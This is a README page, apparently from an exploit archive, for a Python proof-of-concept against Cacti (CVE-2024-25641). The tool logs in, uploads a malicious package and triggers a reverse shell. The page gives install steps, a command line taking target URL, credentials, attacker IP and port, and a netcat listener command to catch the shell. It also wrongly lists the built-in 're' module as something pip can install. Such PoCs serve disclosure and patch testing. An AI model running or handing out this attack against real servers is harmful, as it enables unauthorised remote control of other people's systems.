Share
## https://sploitus.com/exploit?id=79F09F96-046D-52D1-9019-13C34ABABBB8
# Cacti CVE-2024-25641 Authenticated Package Upload RCE Proof of Concept (PoC)

This script is a Proof of Concept (PoC) for exploiting the CVE-2024-25641 vulnerability in Cacti, a web-based monitoring tool. The script automates the process of authenticating with the application, uploading a malicious package, and triggering a reverse shell.

## Requirements

- Python 3.x
- `requests` library
- `argparse` library
- `re` library

You can install the required Python library using pip3:

```bash
pip3 install requests
pip3 install argparse
pip3 install re
```

## Usage
(make sure to place the **test.xml.gz** in the same directory as the **exploit.py**)

```bash
python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]
```

## Start nc listener

```bash
nc -nvlp <port>
```